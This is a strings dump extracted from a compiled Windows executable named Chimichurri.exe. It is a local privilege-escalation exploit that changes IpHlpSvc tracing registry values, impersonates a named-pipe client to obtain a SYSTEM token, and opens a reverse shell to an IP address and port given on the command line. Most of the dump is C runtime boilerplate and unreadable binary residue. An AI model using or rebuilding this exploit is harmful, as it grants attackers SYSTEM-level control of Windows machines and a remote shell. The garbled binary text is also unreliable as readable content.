!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
QQSVWd
HHtVHHt
t h< A
Y;=||A
~pjCXf
j0h`_A
Ht Hu4j
,SVWj0X
Wj0XPV
j@j _W
PWWWWV
PSSSSV
VWh($A
j$hxaA
URPQQh
jA[jZZ+
;t$,v-
UQPXY]Y[
PP9E u
+t HHt
+t"HHt
HAO8 t
Ht+Ht$Ht
Ht HHt
u0h@XA
u!hHXA
~';_t|%3
/Chimichurri/-->Could not connect to %s<BR>
WinSta0\Default
comspec
\\localhost\pipe\x
%windir%\tracing
SOFTWARE\Microsoft\Tracing\IpHlpSvc
FileDirectory
EnableFileTracing
\\.\pipe\x\IpHlpSvc.log
/Chimichurri/-->Couldn't create pipe<BR>
/Chimichurri/-->Error impersonating pipe<BR>
/Chimichurri/-->Couldn't get token<BR>
/Chimichurri/-->Got SYSTEM token...<BR>
/Chimichurri/-->Running reverse shell...<BR>
/Chimichurri/-->This exploit gives you a Local System shell <BR>
/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
/Chimichurri/-->Changing registry values...<BR>
/Chimichurri/-->Couldn't set registry values<BR>
/Chimichurri/-->Restoring default registry values...<BR>
generic
unknown error
iostream
iostream stream error
system
string too long
invalid string position
bad allocation
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
Unknown exception
CorExitProcess
(null)
`h````
xpxxxx
_hypot
_nextafter
bad exception
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateEventExW
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleExW
SetFileInformationByHandleW
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
`h`hhh
xppwpp
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
1#SNAN
1#QNAN
D:\Users\Carsten\Chimichurri\Release\Chimichurri.pdb
GetEnvironmentVariableA
CloseHandle
ConnectNamedPipe
SetEvent
WaitForSingleObject
CreateEventA
CreateThread
GetCurrentThread
CreateNamedPipeA
KERNEL32.dll
ImpersonateNamedPipeClient
OpenThreadToken
DuplicateTokenEx
CreateProcessAsUserA
RegCloseKey
RegOpenKeyExA
RegSetValueExA
ADVAPI32.dll
WSASocketA
WS2_32.dll
HeapAlloc
EncodePointer
DecodePointer
RaiseException
RtlUnwind
GetCommandLineA
GetLastError
ExitProcess
GetModuleHandleExW
GetProcAddress
MultiByteToWideChar
WideCharToMultiByte
GetStdHandle
WriteFile
GetModuleFileNameW
GetProcessHeap
IsDebuggerPresent
IsProcessorFeaturePresent
EnterCriticalSection
LeaveCriticalSection
HeapFree
HeapSize
SetLastError
GetCurrentThreadId
GetFileType
DeleteCriticalSection
GetStartupInfoW
GetModuleFileNameA
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
GetEnvironmentStringsW
FreeEnvironmentStringsW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
UnhandledExceptionFilter
SetUnhandledExceptionFilter
InitializeCriticalSectionAndSpinCount
GetCurrentProcess
TerminateProcess
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetModuleHandleW
LoadLibraryExW
OutputDebugStringW
LCMapStringW
HeapReAlloc
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
SetFilePointerEx
SetStdHandle
WriteConsoleW
CreateFileW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0!070D0J0[0m0t0
2L2f2l2
3%3B3I3R3a3i3
434C4Q4c4m4r4
:A;Q;a;v;
;4<B<L<p<z<
<3=R=i=x=
>"?(?p?~?
3#3+3034383a3
5A5H5L5P5T5X5\5`5d5
507{7^8~8
>'>E>L>P>T>X>\>`>d>h>
>*?5?P?W?\?`?d?
0N0T0X0\0`0
1'2-21262<2@2F2J2P2T2Y2_2c2i2m2s2w2}2
2 3%3/3i3n3u3{3
5'6.6D6N6
9#9,9N9
;!;@;V;`;f;q;
;%<N<a<q<
=$=5=A=H=O=j=t=
>.>b>v>
131d1q1z1
1A2Q2g2
> >$>!?>?
+030J0h0
1 131k1q1w1}1
2&262?2
3'3>3I3x3
4'4<4F4_4i4v4
5$5Y5_5
&0;0E0K0Q0W0
363R3Z3_3
4 4;4@4_4
9$9.9>9
=%=3=8=G=u=
0X2b2h2|2
3&323=3d3
4 4*404@4H4N4]4g4m4|4
5!5(51565<5D5I5O5W5\5b5j5o5u5}5
6 6(6-636;6@6E6N6S6Y6a6f6l6t6y6
7 7$7*72777=7E7J7P7X7]7c7k7p7u7~7
7F8K8]8{8
83999E9J9O9T9]9
=4=E=K=W=g=m=|=
> >)>/>9>D>
?;?H?M?[?
<0b0m0
5%6N6\6b6
6K7Q7]7
5(5:5L5k5}5
<C=e>m>
0A1I1U1d1
;!?%?)?-?1?5?9?=?A?E?I?M?
0 1W1q1
3L3U3s3
4@5I5&616D6X6
7#7/888$9n9w9
;x<8=o=->F>U>v>
? ?i?u?
1,2=2Q2W2\2d2j2
X1\1`1l1p1t1x1|1
5054585<5@5D5H5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
83<3@3D3H3L3
4$4,444<4D4l>p><?@?D?H?
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:
8 9$94989@9X9h9l9|9
: :$:,:D:H:`:p:t:
; ;$;4;8;<;@;H;`;p;t;
< <0<4<8<@<X<
= =(=0=4=<=P=X=l=t=
> >@>\>`>
?,?0?P?X?\?x?
04080@0H0P0T0\0p0
101P1l1p1
282X2x2
1 4$4t4|4
5$5,545<5D5L5T5
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
=8=<=D=
mscoree.dll
AR6002
- floating point support not loaded
- not enough space for arguments
- not enough space for environment
- abort() has been called
- not enough space for thread data
- unexpected multithread lock error
- unexpected heap error
- unable to open console device
- not enough space for _onexit/atexit table
- pure virtual function call
- not enough space for stdio initialization
- not enough space for lowio initialization
- unable to initialize heap
- CRT not initialized
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- not enough space for locale information
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- inconsistent onexit begin-end variables
DOMAIN error
SING error
TLOSS error
runtime error
Runtime Error!
Program:
<program name unknown>
Microsoft Visual C++ Runtime Library
(null)
Aja-JP
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
kernel32.dll
WUSER32.DLL
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
((((( H
((((( H
CONOUT$